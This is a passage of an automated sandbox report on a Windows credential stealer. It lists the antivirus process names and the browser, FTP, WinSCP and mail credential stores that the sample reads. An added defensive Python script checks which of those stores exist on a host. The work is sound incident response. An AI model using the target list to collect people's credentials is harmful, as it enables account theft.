Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 3_2_031CB78C GetVersionExA,3_2_031CB78C
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933710309.0000000022764000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xrbjyllC.pif PID: 4544, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xrbjyllC.pif PID: 4108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xrbjyllC.pif PID: 6568, type: MEMORYSTR
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\xrbjyllC.pif | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
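The file and registry accesses above are the credential stores the payload reads: Chrome and Edge Login Data and cookies, the profiles.ini of Firefox, Cyberfox, BlackHawk and Thunderbird (followed by files inside the resolved profile directory, such as cookies.sqlite), FTP Navigator's Ftplist.txt, WinSCP's saved sessions, Outlook's MAPI profile key and IncrediMail identities. In incident response the practical question is which of these stores existed on the infected host, because that bounds which credentials have to be rotated. The Python below is an added example for this report, not part of the sample or of Joe Sandbox: it checks a user profile root for the paths listed above, resolves profiles.ini to its profile directories the way the report shows the malware doing, and checks the HKCU keys when run on Windows. logins.json and key4.db are the standard Firefox saved-password files and are included by assumption; the tree built by demo() is constructed, not real data.

```python
import configparser
import tempfile
from pathlib import Path

# Stores the report shows xrbjyllC.pif opening, relative to the user's profile root.
FILE_TARGETS = {
    'chrome_cookies': r'AppData\Local\Google\Chrome\User Data\Default\Network\Cookies',
    'chrome_logins':  r'AppData\Local\Google\Chrome\User Data\Default\Login Data',
    'edge_logins':    r'AppData\Local\Microsoft\Edge\User Data\Default\Login Data',
}
# Gecko-style clients: the report reads profiles.ini, then files inside the profile directory.
GECKO_PROFILES = {
    'firefox':     r'AppData\Roaming\Mozilla\Firefox\profiles.ini',
    'cyberfox':    r'AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini',
    'blackhawk':   r'AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini',
    'thunderbird': r'AppData\Roaming\Thunderbird\profiles.ini',
}
# cookies.sqlite is what the report shows being read; logins.json and key4.db are the
# standard Firefox saved-login files and are assumed here to be of interest as well.
GECKO_FILES = ('cookies.sqlite', 'logins.json', 'key4.db')
# Relative to the drive root (C:\FTP Navigator\Ftplist.txt in the report).
DRIVE_TARGETS = {'ftp_navigator': r'FTP Navigator\Ftplist.txt'}
# HKCU keys the report shows being opened (WinSCP sessions, Outlook MAPI profiles, IncrediMail).
REGISTRY_TARGETS = {
    'winscp_sessions':  r'SOFTWARE\Martin Prikryl\WinSCP 2\Sessions',
    'outlook_profiles': r'Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles',
    'incredimail':      r'Software\IncrediMail\Identities',
}


def _rel(root: Path, win_rel: str) -> Path:
    """Join a backslash-separated Windows relative path onto root, portably."""
    return root.joinpath(*win_rel.split('\\'))


def gecko_profile_dirs(ini_path: Path) -> list[Path]:
    """Resolve the [ProfileN] entries of a Firefox-family profiles.ini to directories."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read(ini_path, encoding='utf-8')
    dirs = []
    for section in cfg.sections():
        if not section.startswith('Profile'):
            continue
        path = cfg.get(section, 'Path', fallback='')
        if not path:
            continue
        if cfg.get(section, 'IsRelative', fallback='1') == '1':
            dirs.append(ini_path.parent.joinpath(*path.split('/')))  # relative paths use '/'
        else:
            dirs.append(Path(path))
    return dirs


def exposed_stores(profile_root: Path, drive_root: Path) -> dict[str, list[str]]:
    """Return {store: [files present]} for every store in this report that exists on disk."""
    found: dict[str, list[str]] = {}
    for name, rel in FILE_TARGETS.items():
        p = _rel(profile_root, rel)
        if p.is_file():
            found.setdefault(name, []).append(str(p))
    for name, rel in GECKO_PROFILES.items():
        ini = _rel(profile_root, rel)
        if not ini.is_file():
            continue
        for d in gecko_profile_dirs(ini):
            for fname in GECKO_FILES:
                if (d / fname).is_file():
                    found.setdefault(name, []).append(str(d / fname))
    for name, rel in DRIVE_TARGETS.items():
        p = _rel(drive_root, rel)
        if p.is_file():
            found.setdefault(name, []).append(str(p))
    return found


def exposed_registry_keys() -> list[str]:
    """Check the HKCU keys from the report; only possible when running on Windows."""
    try:
        import winreg
    except ImportError:
        return []
    hits = []
    for name, key in REGISTRY_TARGETS.items():
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key):
                hits.append(name)
        except OSError:
            pass
    return hits


def demo() -> dict[str, list[str]]:
    """Constructed profile tree (not real data): Chrome logins plus one Firefox profile."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        profile = root / 'user'
        chrome = _rel(profile, FILE_TARGETS['chrome_logins'])
        chrome.parent.mkdir(parents=True, exist_ok=True)
        chrome.write_bytes(b'SQLite format 3\x00')
        ini = _rel(profile, GECKO_PROFILES['firefox'])
        ini.parent.mkdir(parents=True, exist_ok=True)
        ini.write_text('[Profile0]\nName=default-release\nIsRelative=1\n'
                       'Path=Profiles/fqs92o4p.default-release\nDefault=1\n', encoding='utf-8')
        ff_profile = ini.parent / 'Profiles' / 'fqs92o4p.default-release'
        ff_profile.mkdir(parents=True, exist_ok=True)
        (ff_profile / 'cookies.sqlite').write_bytes(b'SQLite format 3\x00')
        return exposed_stores(profile, root)


if __name__ == '__main__':
    for store, files in demo().items():
        print(store, files)
```

On a real host call exposed_stores(Path(r'C:\Users\<name>'), Path(r'C:\')) for each interactive user and exposed_registry_keys() from that user's own session, since the registry targets live under HKCU and are per user. The function reports presence only; whether a given store held credentials at infection time is a separate question, which is why the safe response is to rotate everything it lists.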
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
